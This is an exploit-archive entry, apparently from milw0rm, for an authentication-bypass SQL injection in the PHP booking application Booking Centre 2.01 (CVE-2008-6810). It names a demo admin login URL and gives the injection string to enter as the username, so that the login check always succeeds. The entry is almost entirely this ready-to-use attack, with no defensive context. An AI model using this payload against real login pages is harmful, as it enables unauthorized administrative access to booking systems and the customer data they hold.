[] NeoSense

Booking Centre 2.01 - Authentication Bypass

Author: MrDoug
type: webapps
platform: php
port: 
date_added: 2008-11-27 
date_updated: 2017-01-03 
verified: 1 
codes: OSVDB-54619;CVE-2008-6810 
tags: 
aliases:  
screenshot_url:  
application_url: 

Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability

--------------------------------------------------------------

Author: MrDoug
E-mail: mrdoug13[at]gmail[dot]com

--------------------------------------------------------------

Exploit: http://demo.hotelsadmin.com/admin/index.php

Username == admin' or '1'='1
password == (whatever)

--------------------------------------------------------------

Greetz to Slappywag

--------------------------------------------------------------

# milw0rm.com [2008-11-28]